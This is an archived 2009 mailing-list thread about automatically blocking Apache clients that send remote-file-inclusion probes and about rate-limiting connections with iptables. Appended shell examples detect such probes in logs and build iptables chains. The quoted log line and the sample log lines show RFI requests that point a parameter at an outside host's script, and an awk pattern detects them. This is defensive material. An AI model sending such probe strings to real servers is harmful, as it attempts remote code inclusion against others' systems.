blocking ips with iptables accessing invalid URL

ESGLinux esggrupos at gmail.com
Wed Jul 8 10:31:05 UTC 2009


2009/7/8 Manuel Aróstegui <manuel at todo-linux.com>

> On Wed, 08-07-2009 at 09:58 +0200, ESGLinux wrote:
> > Hi all,
> > I'm having a problem with an Apache web server.
> >
> > I get a lot of accesses of this kind:
> >
> >
> > x.x.x.x - - [08/Jul/2009:09:42:20 +0200] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 1015 "-" "Mozilla/5.0"
> >
> > where x.x.x.x is the IP of the client. I suppose this IP is trying to
> > find a security hole in my system, so what I do manually is this:
> >
> > iptables -A INPUT -s x.x.x.x -p tcp --dport 80 -j DROP
> >
> > I want to do this automatically. I'm thinking of using logwatch but I'm
> > not sure how to do it. (I'm testing, but for the moment I haven't found
> > the solution.)
>
> You might want to test fail2ban:
> http://www.fail2ban.org/wiki/index.php/Main_Page


Hey, I think this software does exactly what I want. I'm going to give it a
try.



>
>
> >
> > By the way, I'm interested in limiting the connections to my web server
> > using iptables with the limit module and the burst argument. What do you
> > think about it? Is it a good solution, or am I on the wrong track? Do you
> > know how to prevent DoS attacks?
>
> The first approach that comes to my mind would be something like:
>
> iptables -N APACHE_CHECK
> iptables -A INPUT -p tcp --dport 80 -m state --state NEW -j APACHE_CHECK
> iptables -A APACHE_CHECK -m state --state NEW -m recent --set --name APACHE
> iptables -A APACHE_CHECK -m state --state NEW -m recent --update --seconds 60 --hitcount 4 --name APACHE
> iptables -A APACHE_CHECK -m state --state NEW -m recent --rcheck --seconds 60 --hitcount 4 --name APACHE -j DROP
>
> This will protect you from small DoS attempts from the same IP within 1
> minute.


I like this kind of solution, but I think these rules don't work. With them
the web server does not respond to a single request.

I have loaded this in my test computer:

iptables -N APACHE_CHECK
iptables -A INPUT -p tcp --dport 80 -m state --state NEW -j APACHE_CHECK
iptables -A APACHE_CHECK -m state --state NEW -m recent --set --name APACHE
iptables -A APACHE_CHECK -m state --state NEW -m recent --update --seconds 60 --hitcount 4 --name APACHE
iptables -A APACHE_CHECK -m state --state NEW -m recent --rcheck --seconds 60 --hitcount 4 --name APACHE -j LOG
iptables -A APACHE_CHECK -m state --state NEW -m recent --rcheck --seconds 60 --hitcount 4 --name APACHE -j DROP

I have added a rule to log when packets are dropped, and it logs every
packet. What is wrong?


Thanks for your answer

ESG



>
>
> Manuel.
> --
> Manuel Arostegui Ramirez.
>
> Electronic Mail is not secure, might not be read every day, and should not
> be used for urgent or sensitive issues.
>
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request at redhat.com?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list
>
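To automate the manual block from the start of the thread, here is an added example; it is not code from the thread, from fail2ban or from logwatch. It is a POSIX shell script that pulls the client addresses of remote-file-inclusion probes (requests whose query string points a parameter at an external URL, like the pop3.php line quoted above) out of a combined-format Apache access log and emits one DROP rule per address into a dedicated chain. It goes beyond the one line in the thread by also matching the URL-encoded form (=http%3A%2F%2F...). The chain name PROBE_BLOCK, the function names, the sample log lines and the RFC 5737 test addresses in them are all constructed for the example.

```shell
#!/bin/sh
# Added example, not from the thread: find the sources of remote-file-inclusion
# probes in an Apache combined-format access log and block them with iptables.
# Chain name, log lines and addresses (RFC 5737 test ranges) are constructed.

# Print the unique client IPs whose request line has a query parameter set to
# an external URL, e.g. ...pop3.php?CONFIG[pear_dir]=http://host/id1.txt.
# Also catches the URL-encoded form (=http%3A%2F%2F...). Reads the file given
# as $1, or stdin. Only the request line (the first quoted field) is examined,
# so a Referer or User-Agent containing "=http://" does not trigger a block.
probe_ips() {
    awk -F'"' '
        $2 ~ /^(GET|POST|HEAD) [^ ]*[?][^ ]*=(https?|ftp)(:\/\/|%3[Aa]%2[Ff]%2[Ff])/ {
            split($1, f, " ")   # f[1] is the client address in the combined format
            print f[1]
        }' "${1:--}" | sort -u
}

# Emit one DROP rule per probing address into a dedicated chain (assumed name
# PROBE_BLOCK). By default the commands are only printed; with APPLY=1 they
# are run, skipping addresses already present in the chain.
block_probe_ips() {
    chain=${CHAIN:-PROBE_BLOCK}
    probe_ips "$1" | while read -r ip; do
        rule="iptables -A $chain -s $ip -p tcp --dport 80 -j DROP"
        if [ "${APPLY:-0}" = 1 ]; then
            iptables -nL "$chain" | grep -qwF "$ip" || $rule
        else
            echo "$rule"
        fi
    done
}

# Constructed sample log: two probes from one address, one URL-encoded probe,
# a normal request (with "=http://" only in the Referer) and an unrelated 404.
SAMPLE_LOG='203.0.113.7 - - [08/Jul/2009:09:42:20 +0200] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://example.net//id1.txt??? HTTP/1.1" 404 1015 "-" "Mozilla/5.0"
198.51.100.9 - - [08/Jul/2009:09:43:01 +0200] "GET /index.php?page=http%3A%2F%2Fexample.net%2Fshell.txt HTTP/1.1" 404 1015 "-" "Mozilla/5.0"
192.0.2.5 - - [08/Jul/2009:09:44:11 +0200] "GET /news/?id=42 HTTP/1.1" 200 5120 "http://example.org/?ref=http://example.org/" "Mozilla/5.0"
192.0.2.6 - - [08/Jul/2009:09:45:00 +0200] "GET /missing.html HTTP/1.1" 404 300 "-" "Mozilla/5.0"
203.0.113.7 - - [08/Jul/2009:09:45:30 +0200] "GET /admin/index.php?inc=https://example.net/c.txt HTTP/1.1" 404 1015 "-" "Mozilla/5.0"'

# Dry run over the sample: prints one DROP command for each probing address
printf '%s\n' "$SAMPLE_LOG" | block_probe_ips
```

Create the chain once with `iptables -N PROBE_BLOCK` and `iptables -I INPUT -p tcp --dport 80 -j PROBE_BLOCK` (add 443 as well if the site serves HTTPS), then run the script from cron against the live log with APPLY=1. Two cautions: an address behind a NAT or proxy stands for many users, so a single matching request blocks all of them; and a 404 means the probed script is not there, so the block removes log noise, not risk, and the real protection is keeping the web application itself patched. With fail2ban, the same request-line pattern would go into a filter's failregex with <HOST> in place of the address; check it against the real log with fail2ban-regex before enabling a jail, because a regex that does not match bans nobody and one that matches too widely bans everybody.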



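For the connection-limit part of the thread, here is an added example, not Manuel's or ESG's rule set: a shell function that writes out an iptables recent-module chain with the threshold as a parameter, and with the hit check placed before the rule that records the address. The chain and list names are taken from the thread; the default of 20 new connections per 60 seconds, the log prefix and the function name are assumptions to tune for the site. The point it illustrates is an ordering detail of the recent match: in the rule set quoted above the --set rule comes first, so the connection being evaluated is already counted when --rcheck --hitcount 4 runs, and the fourth new connection from one address inside 60 seconds is dropped. A browser fetches a page's images and stylesheets over several parallel connections, so one page load from one visitor can reach that count, and a client that keeps reconnecting stays over the threshold, so a LOG rule at that point logs every further connection.

```shell
#!/bin/sh
# Added example, not from the thread: emit an iptables "recent" chain that
# allows a source address at most HITS new connections to port 80 per SECS
# seconds. Chain/list names follow the thread; the defaults are assumptions.
#
# Ordering matters: the hit check runs before --set, so the connection being
# evaluated is not yet counted and the first HITS connections pass. With
# --set first (as in the thread), the current connection is already in the
# list and --hitcount 4 fires on the 4th connection within the window.
recent_chain() {
    hits=${1:-20}
    secs=${2:-60}
    chain=${3:-APACHE_CHECK}
    # xt_recent keeps at most ip_pkt_list_tot timestamps per address (module
    # default 20) and rejects a larger --hitcount, so refuse it here too.
    if [ "$hits" -gt 20 ]; then
        echo "hitcount $hits exceeds ip_pkt_list_tot (20); raise the module parameter first" >&2
        return 1
    fi
    cat <<EOF
iptables -N $chain
iptables -A INPUT -p tcp --dport 80 -m state --state NEW -j $chain
# over the limit: log (rate-limited so the log itself cannot be flooded),
# then drop; --update refreshes the entry, so the block lasts while the
# client keeps trying and expires $secs s after it stops
iptables -A $chain -m recent --name APACHE --rcheck --seconds $secs --hitcount $hits -m limit --limit 3/min -j LOG --log-prefix "APACHE_LIMIT: "
iptables -A $chain -m recent --name APACHE --update --seconds $secs --hitcount $hits -j DROP
# under the limit: record this connection and let it through
iptables -A $chain -m recent --name APACHE --set -j ACCEPT
EOF
}

# Print the rule set for review; pipe the output to "sh" as root to apply it.
recent_chain "$@"
```

Pick the threshold from the real access log (new connections per source per minute at normal busy times) rather than from a guess, and remember that this only limits connection rate from one address; it does nothing against a distributed flood or against slow requests over a few kept-alive connections, which need limits in Apache or a reverse proxy instead.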